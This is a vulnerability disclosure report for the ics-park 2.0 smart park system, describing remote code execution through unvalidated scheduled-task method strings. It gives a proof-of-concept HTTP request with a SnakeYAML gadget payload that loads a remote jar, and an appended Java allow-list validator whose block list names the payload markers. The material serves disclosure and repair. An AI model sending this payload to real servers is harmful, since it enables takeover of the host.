| Field | Value |
|---|---|
| Title | fcba_zzm ics-park 2.0 Code Injection |
| Description | A Remote Code Execution Vulnerability in ics-park via Scheduled Tasks (full report below) |

# NAME OF AFFECTED PRODUCT(S)
* ics-park
## Vendor Homepage
https://gitee.com/fcba_zzm/
# AFFECTED AND/OR FIXED VERSION(S)
## Submitter
* yyjccc, ChangeYourWay, Aiyakami
## Vulnerable File
* JobController.java
## VERSION(S)
* V2.0
## Software Link
* [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park)
# PROBLEM TYPE
## Vulnerability Type
* Remote Code Execution
## Root Cause
* The scheduled task module in the vulnerable version does not validate or restrict the target method string during task creation and update. As a result, attackers can specify arbitrary methods such as `org.yaml.snakeyaml.Yaml.load`. When the scheduler executes the task, it directly invokes the provided method without any security checks, allowing malicious payloads to be deserialized and executed, ultimately leading to remote code execution.
## Impact
* Attackers can create malicious tasks that allow remote execution of arbitrary code on the affected server.
* This may lead to full compromise of the server, including manipulation or destruction of business data and logic.
* Sensitive information could be exposed, privileges escalated, and the vulnerability may enable lateral movement within the internal network.
# DESCRIPTION
* The vulnerability exists in the scheduled task management module. When an administrator creates or updates a scheduled task, the application directly accepts user-supplied method references without validating or restricting them. As a result, an attacker who gains administrative access to the application can craft malicious input that is executed by the scheduler with the server’s privileges. This flaw enables arbitrary code execution on the server, potentially leading to a complete compromise of system integrity, confidentiality, and availability.
# Vulnerability details and POC
## Vulnerability location:
* **`JobController.java`**
## Payload:
Example: attacker saves a malicious scheduled task
```http
POST /api/monitor/job/save HTTP/1.1
Host: localhost:8000
appId: 123456
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Referer: http://localhost:8000/monitor/job
sec-ch-ua-platform: "Windows"
token: d6e3601d372b42ffb2eaad21aa6b3598
Origin: http://localhost:8000
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
sign: 96782c8471657d1505b795009245cef0
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept-Encoding: gzip, deflate, br, zstd
Content-Length: 307

{"jobId":0,"jobName":"aaa","jobGroup":"DEFAULT","invokeTarget":"org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:7878/yaml-payload.jar\"]]]]')","cronExpression":"0 15 10 * * ?","misfirePolicy":"1","concurrent":"0","status":"0"}
```
## Screenshots from testing and running the payload:
![Screenshot 1](https://github.com/user-attachments/assets/262df39a-e0e2-4c92-bdb1-a1f2959f6e80)
![Screenshot 2](https://github.com/user-attachments/assets/0ac209fa-30f8-402c-807b-ceeab3f58844)
# Suggested repair
1. Implement whitelist validation: Restrict scheduled task execution to a predefined set of safe and explicitly allowed methods. Reject or block any unrecognized or unsafe method strings.
2. Enhance input validation: Apply strict input checks and sanitization when adding or updating scheduled tasks to prevent injection of arbitrary methods.
3. Update RuoYi code: Upgrade to the latest secure version of RuoYi where this issue has been addressed, or apply the official security patches once available.

| Field | Value |
|---|---|
| Source | https://github.com/Yyjccc/CVE/issues/1 |
| User | Yyjccc (UID 89726) |
| Submission | 02.09.2025 12:51 (8 months ago) |
| Moderation | 13.09.2025 17:13 (11 days later) |
| Status | Accepted |
| VulDB Entry | 323829 [fcba_zzm ics-park Smart Park Management System 2.0 Scheduled Task JobController.java privilege escalation] |
| Points | 20 |
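The following is an added example, not code from ics-park or RuoYi, showing the allow-list validation that the Root Cause and Suggested repair sections call for: the `invokeTarget` string is checked before the task is saved, so the scheduler never reflects on a caller-chosen class. The `beanName.methodName(args)` format, the bean and method names on the allow list, and the `InvokeTargetValidator` class name are assumptions for this example (the real application would list the job beans it actually registers). The report's own payload is included only as a rejected input.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not the project's code): validate a scheduled task's
 * invokeTarget against an allow-list before it is persisted.
 *
 * Accepted shape: beanName.methodName(args), where args is a comma-separated
 * list of single-quoted strings, integers (10, 10L), decimals (1.5D) or
 * booleans. A fully-qualified class such as org.yaml.snakeyaml.Yaml.load(...)
 * has dots before the method name and never reaches the allow-list check.
 * Requires Java 11+ (Set.of, List.of, String.isBlank).
 */
public final class InvokeTargetValidator {

    /** Allow-listed bean.method pairs; the names are assumptions for this example. */
    private static final Set<String> ALLOWED_TARGETS = Set.of(
            "ryTask.ryNoParams",
            "ryTask.ryParams",
            "reportTask.generateDaily");

    private static final int MAX_LENGTH = 200;

    // Bean and method are single identifiers (no dots), followed by a parenthesised argument list.
    private static final Pattern TARGET = Pattern.compile(
            "^([a-zA-Z_][a-zA-Z0-9_]*)\\.([a-zA-Z_][a-zA-Z0-9_]*)\\((.*)\\)$", Pattern.DOTALL);

    // One literal argument: quoted text without quotes/backslashes inside, a number, or a boolean.
    private static final Pattern ARG = Pattern.compile(
            "^('[^'\\\\]*'|-?\\d+[LlDd]?|-?\\d+\\.\\d+[DdFf]?|true|false)$");

    private InvokeTargetValidator() {}

    /** Returns null when the target may be saved, otherwise the reason it was rejected. */
    public static String rejectionReason(String invokeTarget) {
        if (invokeTarget == null || invokeTarget.isBlank()) {
            return "invokeTarget is empty";
        }
        if (invokeTarget.length() > MAX_LENGTH) {
            return "invokeTarget exceeds " + MAX_LENGTH + " characters";
        }
        // Defence in depth only: the structural and allow-list checks below are the real control.
        String lower = invokeTarget.toLowerCase();
        for (String marker : List.of("!!", "http://", "https://", "rmi://", "ldap://", "ldaps://")) {
            if (lower.contains(marker)) {
                return "invokeTarget contains forbidden sequence: " + marker;
            }
        }
        Matcher m = TARGET.matcher(invokeTarget.trim());
        if (!m.matches()) {
            return "invokeTarget is not of the form beanName.methodName(args)";
        }
        String beanAndMethod = m.group(1) + "." + m.group(2);
        if (!ALLOWED_TARGETS.contains(beanAndMethod)) {
            return "target " + beanAndMethod + " is not on the allow-list";
        }
        for (String arg : splitArgs(m.group(3))) {
            if (!ARG.matcher(arg).matches()) {
                return "argument is not a plain literal: " + arg;
            }
        }
        return null;
    }

    /** Splits the argument list on commas that sit outside single quotes. */
    private static List<String> splitArgs(String args) {
        List<String> out = new ArrayList<>();
        if (args.isBlank()) {
            return out;
        }
        StringBuilder cur = new StringBuilder();
        boolean inQuote = false;
        for (char c : args.toCharArray()) {
            if (c == '\'') {
                inQuote = !inQuote;
            }
            if (c == ',' && !inQuote) {
                out.add(cur.toString().trim());
                cur.setLength(0);
            } else {
                cur.append(c);
            }
        }
        out.add(cur.toString().trim());
        return out;
    }

    public static void main(String[] args) {
        String[] samples = {
                "ryTask.ryNoParams()",
                "ryTask.ryParams('ry', 10L, true)",
                // The report's payload: a fully-qualified class plus a YAML document as argument.
                "org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [...]')",
                "ryTask.ryParams('a').getClass()",   // chained call hidden in the argument list
                "otherBean.run()",                    // well-formed but not allow-listed
        };
        for (String s : samples) {
            String reason = rejectionReason(s);
            System.out.println((reason == null ? "ACCEPT  " : "REJECT  ") + s
                    + (reason == null ? "" : "  -> " + reason));
        }
    }
}
```

The order of checks matters: the length cap and forbidden-sequence scan are cheap filters, but the decision that protects the server is that the bean and method names must be plain identifiers and must appear in `ALLOWED_TARGETS`, and that every argument is a literal. Applying the same function to `invokeTarget` values already stored in the job table gives a quick audit of an existing deployment.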